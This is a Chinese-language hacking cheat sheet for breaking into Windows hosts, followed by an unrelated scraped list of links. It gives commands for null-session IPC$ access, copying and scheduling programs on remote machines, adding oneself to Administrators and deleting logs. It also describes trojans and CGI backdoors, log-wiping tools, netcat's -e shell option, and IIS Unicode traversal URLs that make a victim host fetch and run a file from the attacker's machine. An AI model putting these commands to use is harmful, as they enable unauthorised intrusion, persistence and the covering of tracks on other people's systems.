常用的几条NET命令:

  1. 知道对方ip查看对方的计算机名

方法:开始->运行->cmd->net view 对方ip

或者 开始->运行->cmd->nbtstat -a 对方ip

  1. 知道对方计算机名查看对方ip

方法:开始->运行->cmd->ping 对方计算机名

或者 开始->运行->cmd->nbtstat -a 对方计算机名

(与远程主机建立空管连接) net use \IP地址\ipc$ ” ” /use:” ”

(以管理员身份登录远程主机) net use \IP地址\ipc$ ” 密码” /use:” Administrator”

(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \IP地址\admin$

(查看远程主机时间) net time \IP地址

(定时启动某个程序) at \IP地址 02:18 readme.exe

(查看共享) net view \IP地址

(查看netbios工作组列表) nbtstat -A IP地址

(将远程主机C盘映射为自己的F盘) net use f: \IP地址\c$ ” ” /user:” Administrator”

(这两条把自己增加到管理员组): net user 用户名 密码 /add

net localgroup Administrators 用户名 /add

(断开连接) net use \IP地址\ipc$ /delete

del C:\winnt\system32\logfiles*.*

del C:\winnt\system32\config*.evt

del C:\winnt\system32\dtclog*.*

del C:\winnt\system32*.log

del C:\winnt\system32*.txt

del C:\winnt*.txt

del C:\winnt*.log

============================

一、netsvc.exe

下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“ 时间任务” 服务:

netsvc /list \IP地址

netsvc schedule \IP地址 /query

netsvc \IP地址 schedule /start

二、OpenTelnet.exe

远程启动主机的Telnet服务,并绑定端口到7878,例如:

OpenTelnet \IP地址 用户名 密码 1 7878

然后就可以telnet到主机的7878端口,进入DOS方式下:

telnet IP地址 7878

三、winshell.exe

一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD> 后,可打下面的命令:

p Path (查看winshell主程序的路径信息)

b reBoot (重新启动机器)

d shutDown (关闭机器)

s Shell (执行后你就会看到可爱的“ C:> ” )

x eXit (退出本次登录会话,此命令并不终止winshell的运行)

CMD> http://…/srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)

四、3389登陆器,GUI方式登录远程主机的

五、elsave.exe

事件日志清除工具

elsave -s \IP地址 -l ” application” -C

elsave -s \IP地址 -l ” system” -C

elsave -s \IP地址 -l ” security” -C

执行后成功清除应用程序日志,系统日志,安全日志

六、hbulot.exe

开启win2kserver和winxp的3389服务

hbulot [/r]

使用/r表示安装完成后自动重起目标使设置生效。

七、nc.exe(netcat.exe)

一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。

想要连接到某处: nc [-options] hostname port[s] [ports] …

绑定端口等待连接: nc -l -p port [-options] [hostname] [port]

参数:

-e prog 程序重定向,一旦连接,就执行 [危险!!]

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer: 4, 8, 12, …

-h 帮助信息

-i secs 延时的间隔

-l 监听模式,用于入站连接

-n 指定数字的IP地址,不能用hostname

-o file 记录16进制的传输

-p port 本地端口号

-r 任意指定本地及远程端口

-s addr 本地源地址

-u UDP模式

-v 详细输出— — 用两个-v可得到更详细的内容

-w secs timeout的时间

-z 将输入输出关掉— — 用于扫描时

八、TFTPD32.EXE

把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:

http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名

然后可以直接令文件运行:

http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名

九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“ 溢出后在一个端口监听” ,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。

一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。

一、一 Xscan命令行运行参数说明:

在检测过程中,按” [空格]” 键可以查看各线程状态及扫描进度,按” q” 键保存当前数据后提前退出程序,按” ” 强行关闭程序。

1.命令格式: xscan -host [-] [其他选项]

xscan -file [其他选项]

其中 含义如下:

-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的” PORT-SCAN-OPTIONS\PORT-LIST” 项定制待检测端口列表);

-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);

-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);

-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的” CGI-ENCODE\encode_type” 项设置编码方案);

-iis : 检测IIS漏洞(可通过\dat\config.ini文件的” CGI-ENCODE\encode_type” 项设置编码方案);

[其他选项] 含义如下:

-v: 显示详细扫描进度

-p: 跳过Ping不通的主机

-o: 跳过没有检测到开放端口的主机

-t : 指定最大并发线程数量和并发主机数量, 默认数量为100,10

通过IP查询计算机名相关推荐

  1. Android 获取本地外网IP、内网IP、计算机名等信息

    一.获取本地外网IP public static String GetNetIp() { URL infoUrl = null; InputStream inStream = null; try { ...

  2. gost文件修改计算机电脑名字工具,Ghost后自动修改IP及计算机名方法大全.pdf

    Ghost后自动修改IP及计算机名方法大全.pdf Ghost 后自动修改IP及计算机名方法大全 方法一:使用ModiIP 工作原理: 1.客户机全部使用 DHCP 方式获取 IP 地址.由 DHCP ...

  3. 网络克隆自动修改计算机名ip,关于 Ghost 网络克隆后自动修改 IP 及计算机名的方法.doc...

    关于 Ghost 网络克隆后自动修改 IP 及计算机名的方法 关于 Ghost 网络克隆后自动修改 IP 及计算机名的方法最近机房要大批量安装 XP 系统,考虑到种种因素,还是决定采用较成熟的 PXE ...

  4. 修改ip和计算机名,批量设置IP地址和计算机名

    该楼层疑似违规已被系统折叠 隐藏此楼查看此楼 最近由于病毒肆虐,学校的公共机房又瘫痪了,只好利用网络同传把机器全都克隆了一遍,可问题又来啦,每个计算机都要重新设置IP地址.子网掩码.网关和DNS服务器 ...

  5. 域管理中经常用到的组策略禁止修改IP及计算机名

    组策略方法:禁止修改计算机名: 1."运行"->""gpedit.msc"->"用户配置"->"管理摸 ...

  6. 通过计算机名查找当前域用户名,局域网中怎样通过IP查找计算机名

    优质回答 回答者:polkmn145678 IP地址是互联网协议地址的简称.IP地址是一个32位的二进制数. 下面就说下如何简单的查看计算机IP,如何根据IP查找局域网计算机名. 首先:通过" ...

  7. 获取windows系统ip、计算机名、当前用户名

    1.用gethostname函数获取计算机名,用gethostbyname函数获取当前系统ip #include <iostream>using namespace std;#includ ...

  8. 计算机名ip地址批量修改吗,怎么批量修改IP和计算机名

    @echo off for /f tokens=2 delims=: %%i in ('ipconfig /all ^| findstr /i /c:ip address') do set ip=%% ...

  9. win7 查询计算机名,如何查找win7电脑的计算机名和密码

    查找win7电脑的计算机名 查看计算机密码就需要一个工具才能查看,密码都是黑点显示,除非用户自己知道,不然只能使用工具查看系统密码 这个工具可以在登录了系统桌面同时,关闭杀软清理软件的情况下 获取系统 ...

最新文章

  1. 做一个略调皮的个人主页--相册与随笔篇
  2. C# 网络编程之webBrowser乱码问题及解决知识
  3. Doctrine官方手册 - 缓存
  4. maven工程的标准目录结构
  5. Python——列表中存放字典遇到的问题
  6. node php聊天室,最简单的Nodejs聊天室示例
  7. 油田 (Oil Deposits UVA - 572)
  8. C正数负数的原码补码反码以及内存地址分析
  9. 一口气说出 6种 @Transactional 注解失效场景
  10. 兼容性测试中如何切换和管理多个JDK版本
  11. 写弹窗时防止底层滚动
  12. (JS基础)操作表单
  13. UCOS操作系统——任务的挂起与恢复(四)
  14. C语言基础入门需多久,c语言入门基础知识
  15. Windows 下利用cWrsync同步
  16. 【Unity2D】制作游戏主菜单MainMenu
  17. vivo手机怎么安装Android10,vivo X20手机怎么装卡 vivo X20安装手机卡步骤介绍
  18. 【转】bugku never give up 详解
  19. 凌晨三点的程序员,别让你的辛苦被辜负
  20. linux中搭建git与链接github的用法

热门文章

  1. 阿里国际站金品诚企不可忽视的权益
  2. 如何快速接入一个拥有 1.5 亿设备的智能家居平台?
  3. html5基础知识点
  4. 手把手教你实现红黑树
  5. mysql not exists无效_MySQL MATCH AGAINST无效
  6. html代码设置五边形,javascript怎么画正五边形?
  7. 人免疫球蛋白IgG冻干粉——Equitech-Bio分离技术纯化
  8. Dragon slayer(搜索板题)
  9. Lucene 7.5.0 索引文件之tvxtvd
  10. iptables nat及端口映射(转载)